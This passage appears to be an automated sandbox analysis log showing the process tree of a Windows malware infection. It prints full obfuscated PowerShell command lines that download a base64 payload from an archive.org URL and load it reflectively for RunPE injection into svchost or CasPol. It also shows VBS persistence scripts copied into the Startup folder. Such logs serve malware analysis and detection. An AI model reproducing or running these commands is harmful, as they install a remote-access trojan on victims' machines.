9rZShOcicr J1huJysndS crJ2xsLCBb b2JqZWN0W1 1dQChaSG8w L0U3TycrJz I4L2QvZWUu JysnZXRzYX AvLzpzcHR0 aFpIJysnby AsJysnICcr J1pIbzFaSG 8nKycgLCBa SG9DOk93R1 BybycrJ2dy YW1EYScrJ3 RhJysnTycr J3dHWkgnKy dvICwgWkhv aHZuY1onKy dIbywnKyda JysnSG9zdi crJ2Nob3N0 WkhvLFpIb1 pIbyknKycp JykgLWNyZX BMYWNlICAo W2NoQVJdOT ArW2NoQVJd NzIrW2NoQV JdMTExKSxb Y2hBUl0zOS 1yZVBsQUNl J093RycsW2 NoQVJdOTIt cmVQbEFDZS AoW2NoQVJd NzgrW2NoQV JdMTE0K1tj aEFSXTg4KS xbY2hBUl0z Nil8aW52T0 tlLWV4UFJl U1NpT04='; $OWjuxd = [system.Te xt.encodin g]::UTF8.G etString([ system.Con vert]::Fro mbase64Str ing($codig o));powers hell.exe - windowstyl e hidden - executionp olicy bypa ss -NoProf ile -comma nd $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 9156 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6208 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "(('Nr Xurl'+' =' +' Z'+'Ho' +'ht'+'tps ://'+'ia60 0'+'10'+'0 .us.arch'+ 'iv'+'e.'+ 'org/24/'+ 'it'+'ems/ deta'+'h-n '+'ote-v/D '+'e'+'tah NoteV'+'.t x'+'tZHo;N rX'+'ba'+' se64Conten '+'t = (Ne w-Object S ystem.'+'N et.WebC'+' lie'+'nt). Download'+ 'String(Nr Xurl'+');N r'+'X'+'bi '+'n'+'ar' +'yConten' +'t ='+' [ System.Con vert]::Fro mBase'+'64 S'+'tr'+'i n'+'g(NrXb as'+'e64C' +'on'+'ten '+'t);NrXa ssembly = '+'[Reflec '+'tion.'+ 'A'+'ssemb ly]:'+':L' +'oad('+'N r'+'Xbinar '+'yC'+'on t'+'ent)'+ ';'+'NrX'+ 'typ'+'e'+ ' ='+' NrX assembl'+' y.GetType( ZHo'+'RunP E.HomeZHo) ;NrX'+'m'+ 'ethod = ' +'N'+'rXt' +'ype.G'+' etM'+'etho d'+'(ZH'+' oVAIZHo);N '+'r'+'Xme th'+'od.'+ 'In'+'voke (Nr'+'Xn'+ 'u'+'ll, [ object[]]@ (ZHo0/E7O' +'28/d/ee. '+'etsap// :sptthZH'+ 'o ,'+' '+ 'ZHo1ZHo'+ ' , ZHoC:O wGPro'+'gr amDa'+'ta' +'O'+'wGZH '+'o , ZHo hvncZ'+'Ho ,'+'Z'+'Ho sv'+'chost ZHo,ZHoZHo )'+')') -c repLace ([ chAR]90+[c hAR]72+[ch AR]111),[c hAR]39-reP lACe'OwG', [chAR]92-r ePlACe ([c hAR]78+[ch AR]114+[ch AR]88),[ch AR]36)|inv OKe-exPReS SiON" MD5: 04029E121A0CFA5991749937DD22A1D9)
- wscript.exe (PID: 9068 cmdline:
"C:\Windows\System32\WScript.exe" "C:\ProgramData\hvnc.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 4476 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCgnTnJYdX JsJysnID0n KycgWicrJ0 hvJysnaHQn Kyd0cHM6Ly 8nKydpYTYw MCcrJzEwJy snMC51cy5h cmNoJysnaX YnKydlLicr J29yZy8yNC 8nKydpdCcr J2Vtcy9kZX RhJysnaC1u Jysnb3RlLX YvRCcrJ2Un Kyd0YWhOb3 RlVicrJy50 eCcrJ3RaSG 87TnJYJysn YmEnKydzZT Y0Q29udGVu JysndCA9IC hOZXctT2Jq ZWN0IFN5c3 RlbS4nKydO ZXQuV2ViQy crJ2xpZScr J250KS5Eb3 dubG9hZCcr J1N0cmluZy hOclh1cmwn KycpO05yJy snWCcrJ2Jp JysnbicrJ2 FyJysneUNv bnRlbicrJ3 QgPScrJyBb U3lzdGVtLk NvbnZlcnRd OjpGcm9tQm FzZScrJzY0 UycrJ3RyJy snaW4nKydn KE5yWGJhcy crJ2U2NEMn KydvbicrJ3 RlbicrJ3Qp O05yWGFzc2 VtYmx5ID0g JysnW1JlZm xlYycrJ3Rp b24uJysnQS crJ3NzZW1i bHldOicrJz pMJysnb2Fk KCcrJ05yJy snWGJpbmFy JysneUMnKy dvbnQnKydl bnQpJysnOy crJ05yWCcr J3R5cCcrJ2 UnKycgPScr JyBOclhhc3 NlbWJsJysn eS5HZXRUeX BlKFpIbycr J1J1blBFLk hvbWVaSG8p O05yWCcrJ2 0nKydldGhv ZCA9ICcrJ0 4nKydyWHQn Kyd5cGUuRy crJ2V0TScr J2V0aG9kJy snKFpIJysn b1ZBSVpIby k7TicrJ3In KydYbWV0aC crJ29kLicr J0luJysndm 9rZShOcicr J1huJysndS crJ2xsLCBb b2JqZWN0W1 1dQChaSG8w L0U3TycrJz I4L2QvZWUu JysnZXRzYX AvLzpzcHR0 aFpIJysnby AsJysnICcr J1pIbzFaSG 8nKycgLCBa SG9DOk93R1 BybycrJ2dy YW1EYScrJ3 RhJysnTycr J3dHWkgnKy dvICwgWkhv aHZuY1onKy dIbywnKyda JysnSG9zdi crJ2Nob3N0 WkhvLFpIb1 pIbyknKycp JykgLWNyZX BMYWNlICAo W2NoQVJdOT ArW2NoQVJd NzIrW2NoQV JdMTExKSxb Y2hBUl0zOS 1yZVBsQUNl J093RycsW2 NoQVJdOTIt cmVQbEFDZS AoW2NoQVJd NzgrW2NoQV JdMTE0K1tj aEFSXTg4KS xbY2hBUl0z Nil8aW52T0 tlLWV4UFJl U1NpT04='; $OWjuxd = [system.Te xt.encodin g]::UTF8.G etString([ system.Con vert]::Fro mbase64Str ing($codig o));powers hell.exe - windowstyl e hidden - executionp olicy bypa ss -NoProf ile -comma nd $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 2560 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5420 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "(('Nr Xurl'+' =' +' Z'+'Ho' +'ht'+'tps ://'+'ia60 0'+'10'+'0 .us.arch'+ 'iv'+'e.'+ 'org/24/'+ 'it'+'ems/ deta'+'h-n '+'ote-v/D '+'e'+'tah NoteV'+'.t x'+'tZHo;N rX'+'ba'+' se64Conten '+'t = (Ne w-Object S ystem.'+'N et.WebC'+' lie'+'nt). Download'+ 'String(Nr Xurl'+');N r'+'X'+'bi '+'n'+'ar' +'yConten' +'t ='+' [ System.Con vert]::Fro mBase'+'64 S'+'tr'+'i n'+'g(NrXb as'+'e64C' +'on'+'ten '+'t);NrXa ssembly = '+'[Reflec '+'tion.'+ 'A'+'ssemb ly]:'+':L' +'oad('+'N r'+'Xbinar '+'yC'+'on t'+'ent)'+ ';'+'NrX'+ 'typ'+'e'+ ' ='+' NrX assembl'+' y.GetType( ZHo'+'RunP E.HomeZHo) ;NrX'+'m'+ 'ethod = ' +'N'+'rXt' +'ype.G'+' etM'+'etho d'+'(ZH'+' oVAIZHo);N '+'r'+'Xme th'+'od.'+ 'In'+'voke (Nr'+'Xn'+ 'u'+'ll, [ object[]]@ (ZHo0/E7O' +'28/d/ee. '+'etsap// :sptthZH'+ 'o ,'+' '+ 'ZHo1ZHo'+ ' , ZHoC:O wGPro'+'gr amDa'+'ta' +'O'+'wGZH '+'o , ZHo hvncZ'+'Ho ,'+'Z'+'Ho sv'+'chost ZHo,ZHoZHo )'+')') -c repLace ([ chAR]90+[c hAR]72+[ch AR]111),[c hAR]39-reP lACe'OwG', [chAR]92-r ePlACe ([c hAR]78+[ch AR]114+[ch AR]88),[ch AR]36)|inv OKe-exPReS SiON" MD5: 04029E121A0CFA5991749937DD22A1D9)
- wscript.exe (PID: 5168 cmdline:
"C:\Windows\System32\WScript.exe" "C:\ProgramData\hvnc.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 7856 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCgnTnJYdX JsJysnID0n KycgWicrJ0 hvJysnaHQn Kyd0cHM6Ly 8nKydpYTYw MCcrJzEwJy snMC51cy5h cmNoJysnaX YnKydlLicr J29yZy8yNC 8nKydpdCcr J2Vtcy9kZX RhJysnaC1u Jysnb3RlLX YvRCcrJ2Un Kyd0YWhOb3 RlVicrJy50 eCcrJ3RaSG 87TnJYJysn YmEnKydzZT Y0Q29udGVu JysndCA9IC hOZXctT2Jq ZWN0IFN5c3 RlbS4nKydO ZXQuV2ViQy crJ2xpZScr J250KS5Eb3 dubG9hZCcr J1N0cmluZy hOclh1cmwn KycpO05yJy snWCcrJ2Jp JysnbicrJ2 FyJysneUNv bnRlbicrJ3 QgPScrJyBb U3lzdGVtLk NvbnZlcnRd OjpGcm9tQm FzZScrJzY0 UycrJ3RyJy snaW4nKydn KE5yWGJhcy crJ2U2NEMn KydvbicrJ3 RlbicrJ3Qp O05yWGFzc2 VtYmx5ID0g JysnW1JlZm xlYycrJ3Rp b24uJysnQS crJ3NzZW1i bHldOicrJz pMJysnb2Fk KCcrJ05yJy snWGJpbmFy JysneUMnKy dvbnQnKydl bnQpJysnOy crJ05yWCcr J3R5cCcrJ2 UnKycgPScr JyBOclhhc3 NlbWJsJysn eS5HZXRUeX BlKFpIbycr J1J1blBFLk hvbWVaSG8p O05yWCcrJ2 0nKydldGhv ZCA9ICcrJ0 4nKydyWHQn Kyd5cGUuRy crJ2V0TScr J2V0aG9kJy snKFpIJysn b1ZBSVpIby k7TicrJ3In KydYbWV0aC crJ29kLicr J0luJysndm 9rZShOcicr J1huJysndS crJ2xsLCBb b2JqZWN0W1 1dQChaSG8w L0U3TycrJz I4L2QvZWUu JysnZXRzYX AvLzpzcHR0 aFpIJysnby AsJysnICcr J1pIbzFaSG 8nKycgLCBa SG9DOk93R1 BybycrJ2dy YW1EYScrJ3 RhJysnTycr J3dHWkgnKy dvICwgWkhv aHZuY1onKy dIbywnKyda JysnSG9zdi crJ2Nob3N0 WkhvLFpIb1 pIbyknKycp JykgLWNyZX BMYWNlICAo W2NoQVJdOT ArW2NoQVJd NzIrW2NoQV JdMTExKSxb Y2hBUl0zOS 1yZVBsQUNl J093RycsW2 NoQVJdOTIt cmVQbEFDZS AoW2NoQVJd NzgrW2NoQV JdMTE0K1tj aEFSXTg4KS xbY2hBUl0z Nil8aW52T0 tlLWV4UFJl U1NpT04='; $OWjuxd = [system.Te xt.encodin g]::UTF8.G etString([ system.Con vert]::Fro mbase64Str ing($codig o));powers hell.exe - windowstyl e hidden - executionp olicy bypa ss -NoProf ile -comma nd $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 9104 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6272 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "(('Nr Xurl'+' =' +' Z'+'Ho' +'ht'+'tps ://'+'ia60 0'+'10'+'0 .us.arch'+ 'iv'+'e.'+ 'org/24/'+ 'it'+'ems/ deta'+'h-n '+'ote-v/D '+'e'+'tah NoteV'+'.t x'+'tZHo;N rX'+'ba'+' se64Conten '+'t = (Ne w-Object S ystem.'+'N et.WebC'+' lie'+'nt). Download'+ 'String(Nr Xurl'+');N r'+'X'+'bi '+'n'+'ar' +'yConten' +'t ='+' [ System.Con vert]::Fro mBase'+'64 S'+'tr'+'i n'+'g(NrXb as'+'e64C' +'on'+'ten '+'t);NrXa ssembly = '+'[Reflec '+'tion.'+ 'A'+'ssemb ly]:'+':L' +'oad('+'N r'+'Xbinar '+'yC'+'on t'+'ent)'+ ';'+'NrX'+ 'typ'+'e'+ ' ='+' NrX assembl'+' y.GetType( ZHo'+'RunP E.HomeZHo) ;NrX'+'m'+ 'ethod = ' +'N'+'rXt' +'ype.G'+' etM'+'etho d'+'(ZH'+' oVAIZHo);N '+'r'+'Xme th'+'od.'+ 'In'+'voke (Nr'+'Xn'+ 'u'+'ll, [ object[]]@ (ZHo0/E7O' +'28/d/ee. '+'etsap// :sptthZH'+ 'o ,'+' '+ 'ZHo1ZHo'+ ' , ZHoC:O wGPro'+'gr amDa'+'ta' +'O'+'wGZH '+'o , ZHo hvncZ'+'Ho ,'+'Z'+'Ho sv'+'chost ZHo,ZHoZHo )'+')') -c repLace ([ chAR]90+[c hAR]72+[ch AR]111),[c hAR]39-reP lACe'OwG', [chAR]92-r ePlACe ([c hAR]78+[ch AR]114+[ch AR]88),[ch AR]36)|inv OKe-exPReS SiON" MD5: 04029E121A0CFA5991749937DD22A1D9)
- wscript.exe (PID: 6708 cmdline:
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\escrivan.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 8384 cmdline:
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\escrivan.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')') MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 9048 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - PING.EXE (PID: 3472 cmdline:
ping 127.0.0.1 -n 10 MD5: 2F46799D79D22AC72C241EC0322B011D) - powershell.exe (PID: 8704 cmdline:
powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\escrivan.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')') MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 3884 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCgnezB9dX JsID0gezF9 aHR0cHMnKy c6Ly9pYTYw JysnMDEwMC 51cy5hcmNo aScrJ3ZlLm 9yZycrJy8y NC9pJysndG VtcycrJy9k JysnZXQnKy dhJysnaC1u b3RlLXYvRG V0YWgnKydO b3RlVicrJy 50eHR7MX07 ezAnKyd9Ym FzZTY0Q28n KydudGVudC AnKyc9Jysn ICcrJyhOZX ctT2InKydq ZWN0IFN5Jy snc3QnKydl bS5OZScrJ3 QuVycrJ2Vi Q2xpZScrJ2 50KS4nKydE b3dubCcrJ2 9hZFN0Jysn cmluJysnZy h7MCcrJ30n Kyd1cmwpO3 snKycwfWJp bicrJ2FyJy sneUNvbicr J3RlbicrJ3 QgPScrJyAn KydbU3lzdG VtLkNvbnZl cnRdJysnOj onKydGcm9t QmEnKydzZT Y0U3RyaW5n KHswfWJhc2 UnKyc2NENv bicrJ3Rlbn QpO3swfWFz c2UnKydtYm wnKyd5ICcr Jz0nKycgW1 JlZmxlY3Rp b24uQXMnKy dzJysnZW1i bHldOjonKy dMbycrJ2Fk KHswfWJpbm EnKydyeUNv bnRlbnQpO3 swfXR5cCcr J2UgJysnPS B7JysnMH0n Kydhc3NlbS crJ2JseS5H ZXRUJysneX AnKydlKHsx fVInKyd1bl BFJysnLkhv JysnbWV7Jy snMX0pO3sw JysnfScrJ2 1lJysndGhv ZCA9IHswfX R5cGUuR2V0 TWV0aG9kKH sxfVZBJysn SXsxfScrJy k7ezB9Jysn bScrJ2UnKy d0aCcrJ29k LkluJysndi crJ29rZSh7 MH1udScrJ2 xsLCBbb2Jq ZScrJ2N0Wy crJ11dJysn QCh7MX0nKy cwJysnL2dK MWsnKydTJy snL2QvJysn ZWUuZScrJ3 RzYXAvLzpz cHR0aHsxJy snfScrJyAs JysnIHsxfW RlJysnc2F0 JysnaXZhZG 97MScrJ30n KycgLCB7MS crJ31kZXNh dGl2YScrJ2 QnKydvezF9 ICwgezF9Jy snZGUnKydz YXRpdmFkb3 snKycxfSx7 MX1DJysnYS crJ3NQbycr J2x7MX0nKy csezEnKyd9 eycrJzF9KS knKS1mICBb Y2hBUl0zNi xbY2hBUl0z OSkgfElleA ==';$OWjux d = [syste m.Text.enc oding]::UT F8.GetStri ng([system .Convert]: :Frombase6 4String($c odigo));po wershell.e xe -window style hidd en -execut ionpolicy bypass -No Profile -c ommand $OW juxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 4024 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 2144 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "(('{0 }url = {1} https'+':/ /ia60'+'01 00.us.arch i'+'ve.org '+'/24/i'+ 'tems'+'/d '+'et'+'a' +'h-note-v /Detah'+'N oteV'+'.tx t{1};{0'+' }base64Co' +'ntent '+ '='+' '+'( New-Ob'+'j ect Sy'+'s t'+'em.Ne' +'t.W'+'eb Clie'+'nt) .'+'Downl' +'oadSt'+' rin'+'g({0 '+'}'+'url );{'+'0}bi n'+'ar'+'y Con'+'ten' +'t ='+' ' +'[System. Convert]'+ '::'+'From Ba'+'se64S tring({0}b ase'+'64Co n'+'tent); {0}asse'+' mbl'+'y '+ '='+' [Ref lection.As '+'s'+'emb ly]::'+'Lo '+'ad({0}b ina'+'ryCo ntent);{0} typ'+'e '+ '= {'+'0}' +'assem'+' bly.GetT'+ 'yp'+'e({1 }R'+'unPE' +'.Ho'+'me {'+'1});{0 '+'}'+'me' +'thod = { 0}type.Get Method({1} VA'+'I{1}' +');{0}'+' m'+'e'+'th '+'od.In'+ 'v'+'oke({ 0}nu'+'ll, [obje'+'c t['+']]'+' @({1}'+'0' +'/gJ1k'+' S'+'/d/'+' ee.e'+'tsa p//:sptth{ 1'+'}'+' , '+' {1}de' +'sat'+'iv ado{1'+'}' +' , {1'+' }desativa' +'d'+'o{1} , {1}'+'d e'+'sativa do{'+'1},{ 1}C'+'a'+' sPo'+'l{1} '+',{1'+'} {'+'1}))') -f [chAR]3 6,[chAR]39 ) |Iex" MD5: 04029E121A0CFA5991749937DD22A1D9) - CasPol.exe (PID: 3200 cmdline:
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
- cmd.exe (PID: 8500 cmdline:
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_32.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8512 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 6240 cmdline:
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\32\hnvc.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 1680 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCgnTnJYdX JsJysnID0n KycgWicrJ0 hvJysnaHQn Kyd0cHM6Ly 8nKydpYTYw MCcrJzEwJy snMC51cy5h cmNoJysnaX YnKydlLicr J29yZy8yNC 8nKydpdCcr J2Vtcy9kZX RhJysnaC1u Jysnb3RlLX YvRCcrJ2Un Kyd0YWhOb3 RlVicrJy50 eCcrJ3RaSG 87TnJYJysn YmEnKydzZT Y0Q29udGVu JysndCA9IC hOZXctT2Jq ZWN0IFN5c3 RlbS4nKydO ZXQuV2ViQy crJ2xpZScr J250KS5Eb3 dubG9hZCcr J1N0cmluZy hOclh1cmwn KycpO05yJy snWCcrJ2Jp JysnbicrJ2 FyJysneUNv bnRlbicrJ3 QgPScrJyBb U3lzdGVtLk NvbnZlcnRd OjpGcm9tQm FzZScrJzY0 UycrJ3RyJy snaW4nKydn KE5yWGJhcy crJ2U2NEMn KydvbicrJ3 RlbicrJ3Qp O05yWGFzc2 VtYmx5ID0g JysnW1JlZm xlYycrJ3Rp b24uJysnQS crJ3NzZW1i bHldOicrJz pMJysnb2Fk KCcrJ05yJy snWGJpbmFy JysneUMnKy dvbnQnKydl bnQpJysnOy crJ05yWCcr J3R5cCcrJ2 UnKycgPScr JyBOclhhc3 NlbWJsJysn eS5HZXRUeX BlKFpIbycr J1J1blBFLk hvbWVaSG8p O05yWCcrJ2 0nKydldGhv ZCA9ICcrJ0 4nKydyWHQn Kyd5cGUuRy crJ2V0TScr J2V0aG9kJy snKFpIJysn b1ZBSVpIby k7TicrJ3In KydYbWV0aC crJ29kLicr J0luJysndm 9rZShOcicr J1huJysndS crJ2xsLCBb b2JqZWN0W1 1dQChaSG8w L0U3TycrJz I4L2QvZWUu JysnZXRzYX AvLzpzcHR0 aFpIJysnby AsJysnICcr J1pIbzFaSG 8nKycgLCBa SG9DOk93R1 BybycrJ2dy YW1EYScrJ3 RhJysnTycr J3dHWkgnKy dvICwgWkhv aHZuY1onKy dIbywnKyda JysnSG9zdi crJ2Nob3N0 WkhvLFpIb1 pIbyknKycp JykgLWNyZX BMYWNlICAo W2NoQVJdOT ArW2NoQVJd NzIrW2NoQV JdMTExKSxb Y2hBUl0zOS 1yZVBsQUNl J093RycsW2 NoQVJdOTIt cmVQbEFDZS AoW2NoQVJd NzgrW2NoQV JdMTE0K1tj aEFSXTg4KS xbY2hBUl0z Nil8aW52T0 tlLWV4UFJl U1NpT04='; $OWjuxd = [system.Te xt.encodin g]::UTF8.G etString([ system.Con vert]::Fro mbase64Str ing($codig o));powers hell.exe - windowstyl e hidden - executionp olicy bypa ss -NoProf ile -comma nd $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 6880 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 8684 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "(('Nr Xurl'+' =' +' Z'+'Ho' +'ht'+'tps ://'+'ia60 0'+'10'+'0 .us.arch'+ 'iv'+'e.'+ 'org/24/'+ 'it'+'ems/ deta'+'h-n '+'ote-v/D '+'e'+'tah NoteV'+'.t x'+'tZHo;N rX'+'ba'+' se64Conten '+'t = (Ne w-Object S ystem.'+'N et.WebC'+' lie'+'nt). Download'+ 'String(Nr Xurl'+');N r'+'X'+'bi '+'n'+'ar' +'yConten' +'t ='+' [ System.Con vert]::Fro mBase'+'64 S'+'tr'+'i n'+'g(NrXb as'+'e64C' +'on'+'ten '+'t);NrXa ssembly = '+'[Reflec '+'tion.'+ 'A'+'ssemb ly]:'+':L' +'oad('+'N r'+'Xbinar '+'yC'+'on t'+'ent)'+ ';'+'NrX'+ 'typ'+'e'+ ' ='+' NrX assembl'+' y.GetType( ZHo'+'RunP E.HomeZHo) ;NrX'+'m'+ 'ethod = ' +'N'+'rXt' +'ype.G'+' etM'+'etho d'+'(ZH'+' oVAIZHo);N '+'r'+'Xme th'+'od.'+ 'In'+'voke (Nr'+'Xn'+ 'u'+'ll, [ object[]]@ (ZHo0/E7O' +'28/d/ee. '+'etsap// :sptthZH'+ 'o ,'+' '+ 'ZHo1ZHo'+ ' , ZHoC:O wGPro'+'gr amDa'+'ta' +'O'+'wGZH '+'o , ZHo hvncZ'+'Ho ,'+'Z'+'Ho sv'+'chost ZHo,ZHoZHo )'+')') -c repLace ([ chAR]90+[c hAR]72+[ch AR]111),[c hAR]39-reP lACe'OwG', [chAR]92-r ePlACe ([c hAR]78+[ch AR]114+[ch AR]88),[ch AR]36)|inv OKe-exPReS SiON" MD5: 04029E121A0CFA5991749937DD22A1D9)
- cmd.exe (PID: 7548 cmdline:
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_pow.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 3332 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 7132 cmdline:
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\pow\wm.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 8176 cmdline:
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')') MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7464 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - PING.EXE (PID: 3748 cmdline:
ping 127.0.0.1 -n 10 MD5: 2F46799D79D22AC72C241EC0322B011D) - powershell.exe (PID: 5544 cmdline:
powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')') MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 8012 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCgnezB9dX JsID0gezF9 aHR0cHMnKy c6Ly9pYTYw JysnMDEwMC 51cy5hcmNo aScrJ3ZlLm 9yZycrJy8y NC9pJysndG VtcycrJy9k JysnZXQnKy dhJysnaC1u b3RlLXYvRG V0YWgnKydO b3RlVicrJy 50eHR7MX07 ezAnKyd9Ym FzZTY0Q28n KydudGVudC AnKyc9Jysn ICcrJyhOZX ctT2InKydq ZWN0IFN5Jy snc3QnKydl bS5OZScrJ3 QuVycrJ2Vi Q2xpZScrJ2 50KS4nKydE b3dubCcrJ2 9hZFN0Jysn cmluJysnZy h7MCcrJ30n Kyd1cmwpO3 snKycwfWJp bicrJ2FyJy sneUNvbicr J3RlbicrJ3 QgPScrJyAn KydbU3lzdG VtLkNvbnZl cnRdJysnOj onKydGcm9t QmEnKydzZT Y0U3RyaW5n KHswfWJhc2 UnKyc2NENv bicrJ3Rlbn QpO3swfWFz c2UnKydtYm wnKyd5ICcr Jz0nKycgW1 JlZmxlY3Rp b24uQXMnKy dzJysnZW1i bHldOjonKy dMbycrJ2Fk KHswfWJpbm EnKydyeUNv bnRlbnQpO3 swfXR5cCcr J2UgJysnPS B7JysnMH0n Kydhc3NlbS crJ2JseS5H ZXRUJysneX AnKydlKHsx fVInKyd1bl BFJysnLkhv JysnbWV7Jy snMX0pO3sw JysnfScrJ2 1lJysndGhv ZCA9IHswfX R5cGUuR2V0 TWV0aG9kKH sxfVZBJysn SXsxfScrJy k7ezB9Jysn bScrJ2UnKy d0aCcrJ29k LkluJysndi crJ29rZSh7 MH1udScrJ2 xsLCBbb2Jq ZScrJ2N0Wy crJ11dJysn QCh7MX0nKy cwJysnL2dK MWsnKydTJy snL2QvJysn ZWUuZScrJ3 RzYXAvLzpz cHR0aHsxJy snfScrJyAs JysnIHsxfW RlJysnc2F0 JysnaXZhZG 97MScrJ30n KycgLCB7MS crJ31kZXNh dGl2YScrJ2 QnKydvezF9 ICwgezF9Jy snZGUnKydz YXRpdmFkb3 snKycxfSx7 MX1DJysnYS crJ3NQbycr J2x7MX0nKy csezEnKyd9 eycrJzF9KS knKS1mICBb Y2hBUl0zNi xbY2hBUl0z OSkgfElleA ==';$OWjux d = [syste m.Text.enc oding]::UT F8.GetStri ng([system .Convert]: :Frombase6 4String($c odigo));po wershell.e xe -window style hidd en -execut ionpolicy bypass -No Profile -c ommand $OW juxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 2732 cmdline:
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 4128 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "(('{0 }url = {1} https'+':/ /ia60'+'01 00.us.arch i'+'ve.org '+'/24/i'+ 'tems'+'/d '+'et'+'a' +'h-note-v /Detah'+'N oteV'+'.tx t{1};{0'+' }base64Co' +'ntent '+ '='+' '+'( New-Ob'+'j ect Sy'+'s t'+'em.Ne' +'t.W'+'eb Clie'+'nt) .'+'Downl' +'oadSt'+' rin'+'g({0 '+'}'+'url );{'+'0}bi n'+'ar'+'y Con'+'ten' +'t ='+' ' +'[System. Convert]'+ '::'+'From Ba'+'se64S tring({0}b ase'+'64Co n'+'tent); {0}asse'+' mbl'+'y '+ '='+' [Ref lection.As '+'s'+'emb ly]::'+'Lo '+'ad({0}b ina'+'ryCo ntent);{0} typ'+'e '+ '= {'+'0}' +'assem'+' bly.GetT'+ 'yp'+'e({1 }R'+'unPE' +'.Ho'+'me {'+'1});{0 